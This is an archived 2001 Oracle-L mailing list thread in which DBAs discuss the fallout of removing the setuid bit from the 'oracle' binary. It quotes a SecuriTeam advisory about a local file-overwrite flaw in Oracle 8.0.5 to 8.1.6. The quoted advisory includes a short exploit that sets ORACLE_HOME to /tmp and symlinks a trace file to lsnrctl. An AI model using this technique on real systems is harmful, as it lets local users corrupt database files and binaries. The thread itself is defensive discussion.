Oracle FAQ Your Portal to the Oracle Knowledge Grid
HOME | ASK QUESTION | ADD INFO | SEARCH | E-MAIL US
 

Home -> Community -> Mailing Lists -> Oracle-L -> Re: FW: [UNIX] Vulnerability Found In 'oracle' Binary

Re: FW: [UNIX] Vulnerability Found In 'oracle' Binary

From: Jared Still <jkstill_at_cybcon.com>
Date: Sun, 12 Aug 2001 13:43:59 -0700
Message-ID: <F001.0036878C.20010812133549@fatcity.com> 







Doh!  I didn't even consider that. 



Via SQL*Net works properly of course.



Jared



On Friday 10 August 2001 18:45, John Kanagaraj wrote:


> Joe,

>

> Don't mind if I switch to size 12 font - my eyes are giving out :)

>

> A small correction - If the suid is taken off 'oracle', only 'oracle' will

> be able to log on *locally*, i.e. if you are using ORACLE_SID and login via

> local SQL*Plus or forms/reports. Other *NIX users will recieve an 'unable

> to attach to SHM' error. This is because the non-'oracle' user will not

> have permission either to read/write from SHM or the datafiles. They can do

> so only when assuming the privs via SUID on the 'oracle' binary. When

> connecting via SQL*Net, the listener starts up all processes under the

> 'oracle' and thus assume all privs, so any user can connect via SQL*Net. To

> connect locally without errors in this case, set TWO_TASK rather than

> ORACLE_SID.


>

> Hope that clarifies!

> John Kanagaraj

> Oracle Applications DBA

> DB Soft Inc

> Work : (408) 970 7002

>

> Listen to great, commercial-free christian music 24x7x365 at

> http://www.klove.com <http://www.klove.com/>

>

> ** The opinions and facts contained in this message are entirely mine and

> do not reflect those of my employer or customers **

>

>

>

>

>  -----Original Message-----

> Sent: Friday, August 10, 2001 12:26 PM

> To: Multiple recipients of list ORACLE-L

>

>

>

> problem is if you take off the suid but only oracle will be able log on if

> i rememebr correctly.

>

> joe

>

> >>> lerobe_at_acxiom.co.uk 08/10/01 12:50PM >>>

>

> Anyone come across this before ??

>

> Lee

>

> > The following security advisory is sent to the securiteam mailing list,

> > and can be found at the SecuriTeam web site: http://www.securiteam.com

>

> <http://www.securiteam.com>

>

> > Vulnerability Found In 'oracle' Binary

> > ------------------------------------------------------------------------

> >

> >

> > SUMMARY


> > There is a write permission checking error in the 'oracle' binary that

> > can be used by local users to overwrite any file owned by the oracle

> > user. This would allow a local user to corrupt database files, overwrite

> > existing oracle binaries, etc.

> > DETAILS


> > Vulnerable systems:

> > Oracle version 8.0.5 up to version 8.1.6

> > Temporary solution:

> > Remove the setuid oracle off the oracle binary:

> > # chmod -s oracle

> > Exploit:

> > $ cd /tmp

> > $ mkdir rdbms

> > $ cd rdbms/

> > $ mkdir log

> > $ cd log

> > $

> > $ ls -alc

> > total 8

> > drwxrwxr-x    2 pask     pask         4096 dic 14 02:33 .

> > drwxrwxr-x    3 pask     pask         4096 dic 14 02:33 .

> > $ export ORACLE_HOME=/tmp

> > $ export REAL_ORACLE_HOME=/usr/local/oracle/app/oracle/product/8.0.5

> > $ $REAL_ORACLE_HOME/bin/oracle

> > $ ls -alc

> > total 12

> > drwxrwxr-x    2 pask     pask         4096 dic 14 02:35 .

> > drwxrwxr-x    3 pask     pask         4096 dic 14 02:33 .

> > *    rw-r-----    1 oracle   pask           47 dic 14 02:35 ora_24028.trc

> >

> > $ ln -s $REAL_ORACLE_HOME/bin/lsnrctl ./ora_24050.trc

> > $ $REAL_ORACLE_HOME/bin/oracle

> > $ $REAL_ORACLE_HOME/bin/oracle

> > $ $REAL_ORACLE_HOME/bin/oracle

> > $ $REAL_ORACLE_HOME/bin/oracle

> >

> >

> > ========================================

> >

> >

> > This bulletin is sent to members of the SecuriTeam mailing list.

> > To unsubscribe from the list, send mail with an empty subject line and

> > body to: list-unsubscribe_at_securiteam.com

> > In order to subscribe to the mailing list, simply forward this email to:

> > list-subscribe_at_securiteam.com

> >

> > ====================

> > ====================

> >

> > DISCLAIMER:


> > The information in this bulletin is provided "AS IS" without warranty of

> > any kind.

> > In no event shall we be liable for any damages whatsoever including

> > direct, indirect, incidental, consequential, loss of business profits or

> > special damages.

>

> The information contained in this communication is

> confidential, is intended only for the use of the recipient

> named above, and may be legally privileged. If the reader

> of this message is not the intended recipient, you are

> hereby notified that any dissemination, distribution or

> copying of this communication is strictly prohibited.

> If you have received this communication in error, please

> re-send this communication to the sender and delete the

> original message or any copy of it from your computer

> system.


-- 
Please see the official ORACLE-L FAQ: http://www.orafaq.com
-- 
Author: Jared Still
  INET: jkstill_at_cybcon.com

Fat City Network Services    -- (858) 538-5051  FAX: (858) 538-5051
San Diego, California        -- Public Internet access / Mailing Lists
--------------------------------------------------------------------
To REMOVE yourself from this mailing list, send an E-Mail message
to: ListGuru_at_fatcity.com (note EXACT spelling of 'ListGuru') and in
the message BODY, include a line containing: UNSUB ORACLE-L
(or the name of mailing list you want to be removed from).  You may
also send the HELP command for other information (like subscribing).


Received on Sun Aug 12 2001 - 15:43:59 CDT












Original text of this message













  HOME |
  ASK QUESTION |
  ADD INFO |
  SEARCH |
  E-MAIL US